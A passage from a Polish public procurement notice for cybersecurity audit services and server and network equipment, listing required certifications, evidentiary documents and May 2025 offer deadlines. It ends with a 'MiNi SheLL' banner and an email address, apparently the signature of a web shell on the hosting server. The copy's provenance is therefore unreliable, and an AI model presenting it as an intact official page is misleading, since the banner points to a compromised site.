osób, które uczestniczyły w co najmniej 2 projektach dotyczących zarządzania ryzykiem w bezpieczeństwie<br/>informacji, w tym w co najmniej 1 projekcie dotyczącym zarządzania ryzykiem na podstawie normy ISO 27005.<br/>• minimum 1 osobę posiadającą wiedzę w zakresie wymagań Ustawy z dnia 5 lipca 2018 r. o krajowym systemie<br/>cyberbezpieczeństwa potwierdzoną ważnym certyfikatem ukończenia szkolenia w tym zakresie lub innym równoważnym<br/>dokumentem (zaświadczeniem);<br/>• minimum 1 osobę, która przeprowadziła co najmniej 10 szkoleń w zakresie cyberbezpieczeństwa / bezpieczeństwa<br/>informacji / ochrony danych dla podmiotów publicznych;<br/>• minimum 1 osobę posiadającą wiedzę w zakresie zarządzania cyberbezpieczeństwem potwierdzoną ważnym certyfikatem<br/>ukończenia szkolenia w tym zakresie lub innym równoważnym dokumentem (zaświadczeniem);<br/>• minimum 1 osobę posiadającą wiedzę w zakresie administrowania sieciami teleinformatycznymi, potwierdzoną ważnym<br/>certyfikatem ukończenia szkolenia w tym zakresie lub innym równoważnym dokumentem (zaświadczeniem).<br/>• minimum 1 osobę, która ukończyła wyższe studia techniczne w zakresie cyberbezpieczeństwa oraz uzyskała tytuł<br/>inżyniera, potwierdzony dyplomem ukończenia studiów wyższych.<br/>• minimum 1 osobę, która odbyła specjalistyczne szkolenie w zakresie cyberbezpieczeństwa, na podstawie norm ISO<br/>27001, 22301 i przepisów RODO, potwierdzone certyfikatem ukończenia szkolenia w tym zakresie lub innym równoważnym<br/>dokumentem (zaświadczeniem).<br/>O udzielenie części II zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>- w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, zrealizował co najmniej dwie dostawy o podobnym charakterze (przez co Zamawiający rozumie dostawy<br/>sprzętu serwerowego, macierzowego oraz sieciowego na kwotę minimum 250 000,00 zł brutto) wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów<br/>określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku<br/>świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych<br/>lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,<br/>- dysponuje osobami zdolnymi do realizacji zamówienia (dysponuje lub będzie dysponował) co najmniej:<br/>􀀀 2 osobami posiadającymi wiedzę i doświadczenie w zakresie: implementacji środowisk sieciowych i systemowych<br/>opartych na platformach Microsoft Server, obejmujące instalowanie i konfigurowanie elementów systemów oraz<br/>posiadającymi wiedzę i doświadczenie w zakresie zarządzania tymi środowiskami i rozwiązywania dotyczących ich<br/>problemów, obejmujące administrowanie systemami i obsługę ich użytkowników przy spełnieniu wymagań dla Microsoft<br/>Certified Solutions Associate (MCSA) lub wymagań równoważnych, tj., określonych na nie niższym poziomie jakości,<br/>potwierdzone certyfikatem Microsoft Certified Solutions Associate (MCSA) lub innym równoważnym dokumentem<br/>(zaświadczeniem);<br/>􀀀 2 osobami posiadającymi wiedzę i doświadczenie w zakresie definiowania i charakteryzowania najważniejszych technik<br/>ataków stosowanych przez hakerów oraz identyfikowania i analizowania podatności na ataki hakerów w organizacji a także<br/>w tworzeniu polityki na urządzeniach IDS/IPS dotyczącej wykrywania włamań, spełniającej wymagania dla Certified Ethical<br/>Hacker (CEH) lub inne równoważne, tj. określone na nie niższym poziomie jakości niż CEH, potwierdzone certyfikatem<br/>ukończenia szkolenia Certified Ethical Hacker (CEH) lub innym tożsamym dokumentem (zaświadczeniem);<br/>􀀀 1 osobą posiadającą certyfikat CWNP Certified Wireless Network Administrator <br/>􀀀 1 osobą posiadającą wiedzę i doświadczenie z zakresu tworzenia skryptów i programów w języku Python na posiadanym<br/>przez zamawiającego oprogramowaniu lub systemach operacyjnych. <br/>O udzielenie części III zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: zdolności technicznej lub zawodowej:Wykonawca spełni warunek, jeżeli wykaże, że: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował co najmniej jedną dostawę o podobnym charakterze<br/>	dysponuje osobami zdolnymi do realizacji zamówienia (dysponuje lub będzie dysponował) co najmniej 1 osobą do realizacji przedmiotu zamówienia i potwierdzi jej zdolność do wykonania zadania załączeniem dowodów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">części I Zamówienia:<br/>• Referencje lub inny dok. potw. prawidłowe wykonanie co najmniej jednego audytu cyberbezp. w ciągu ostatnich 3 lat, o wartości co<br/>najmniej 50 tys. zł brutto w podm. realizującym zadania publiczne, potwierdzony referencjami;<br/>• Referencje lub inny dok. potw. prawidłowe wykonanie, co najmniej jednego, innego audytu bezpieczeństwa informacji o wartości co<br/>najmniej 50 tys. zł brutto, w podm. realizującym zadania publiczne;<br/>• Referencje lub inny dok. potw. prawidłowe wykonanie czterech innych audytów cyberbezp. o wartości co najmniej 20 000,00 zł<br/>brutto w podmiotach realizujących zadania publiczne;<br/>• Referencje lub inny dok. potw. prawidłowe wykonanie co najmniej 15 innych audytów bezpieczeństwa informacji;<br/>• Referencje lub inny dok. potw. prawidłowe wykonanie co najmniej dwóch projektów dotyczących szacowania ryzyka dla<br/>bezpieczeństwa danych w systemach informatycznych, w tym w co najmniej 1 projekcie dotyczącym zarządzania ryzykiem na<br/>podstawie normy ISO 27005;<br/>• Referencje lub inny dok. potw. prawidłowe wykonanie co najmniej dwóch projektów polegających na świadczeniu usług w zakresie<br/>stworzenia dokumentacji systemu zarządzania bezpieczeństwem informacji dla podmiotów publicznych;<br/>• Co najmniej dwa zaśw. ukończenia kursu Information Security Management Systems Auditor (ISMS);<br/>• Co najmniej 2 aktualne certyfikaty wskazane w Rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018r. w sprawie<br/>wykazu certyfikatów uprawniających do przeprowadzenia audytu;<br/>• Certyfikat audytora wiodącego systemu zarządzania ciągłością działania PN-EN ISO 22301;<br/>• Co najmniej 2 certyfikaty Audytora Wewnętrznego Systemu Zarządzania Jakością według normy PN-EN ISO 9001;<br/>• Dyplomy uk. studiów podyplomowych w zakresie ochrony danych osobowych / bezpieczeństwa informacji;<br/>• Referencje lub inne dok. potw. odpowiednie doświadczenie (co najmniej 8 lat) na stanowisku związanym z ochroną danych<br/>osobowych/ bezpieczeństwem informacji;<br/>• Certyfikat/ zaśw. ukończenia szkolenia w zakresie wdrożenia systemu zarządzania bezpieczeństwem informacji wg ISO 27001;<br/>• Certyfikat/ zaśw. ukończenia szkolenia w zakresie ryzyka w ochronie informacji;<br/>• Certyfikat uk. szkolenia w zakresie wymagań Ustawy z dnia 5 lipca 2018 r. o krajowym systemie cyberbezp.;<br/>• Referencje za przeprowadzenie co najmniej 10 szkoleń w zakresie cyberbezp. / bezp. informacji / ochrony danych dla podmiotów<br/>publicznych;<br/>• Certyfikat uk. szkolenia w zakresie zarządzania cyberbezp.;<br/>• Certyfikat uk. szkolenia w zakresie administrowania sieciami teleinformatycznymi;<br/>• Dyplom uk. wyższych studiów technicznych w zakresie cyberbezp., potwierdzający uzyskanie tytułu inżyniera;<br/>• Zaśw. o odbyciu specjalistycznego szkolenia w zakresie cyberbezp. na podstawie norm ISO 27001, 22301 i przepisów RODO;<br/>Dla II części zamówienia:<br/>• Co najmniej 2 aktualne certyfikaty Microsoft Certified Solutions Associate (MCSA) lub inne równoważne dok. (zaśw.),<br/>• Co najmniej 2 aktualne certyfikaty uk. szkolenia Certified Ethical Hacker (CEH) lub inne tożsame dok. (zaśw.),<br/>• certyfikat CWNP Certified Wireless Network Administrator lub inny równoważny dok. potw. wiedzę z zakresu wdrażania,<br/>zarządzania i rozwiązywania problemów z infrastrukturą sieci WLAN, przy użyciu praktyk spełniających wymagania określone dla<br/>CWNP Certified Wireless Network Administrator lub inne równoważne, tj. określone na nie niższym poziomie jakości niż CWNP<br/>Certified Wireless Network Administrator,<br/>• certyfikat PCAP - Certified Associate in Python Programming lub inny równoważny dok. (zaśw.),<br/>• wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, <br/>Dla III części zamówienia:<br/>-wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych (..)<br/>-wykaz osób skierowanych do wykonania zadania wraz z dowodami określającymi, że w okresie zatrudnienia u obecnego pracodawcy zrealizowały dostawy (..)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dla Części I Zamówienia:<br/>Ogłoszenie nr 2024/BZP 00630583/01 z dnia 2024-12-03<br/>2024-12-03 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>a) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>Dla Części II Zamówienia:<br/>a) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>Dla Części III Zamówienia:<br/>a) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2.	W przypadku, o którym mowa w ust. 1 Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty.<br/><br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VIII ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.	Dokumenty wspólne takie jak np.: formularz ofertowy składa pełnomocnik Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną.<br/>5.	Wykonawcy wspólnie ubiegający się o zamówienie dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy.<br/><br/>6.	Przed podpisaniem umowy (w przypadku wygrania postepowania) Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ze względu na ograniczoną ilość znaków w niniejszej sekcji ogłoszenia informacje dotyczące rodzaju i zakresu zmian<br/>umowy oraz warunków ich wprowadzenia znajdują się w Specyfikacji Warunków Zamówienia - załącznik nr 7 a, 7b, 7c dostępne pod adresem strony prowadzonego postępowania: https://platformazakupowa.pl/transakcja/1105427 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1105427</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com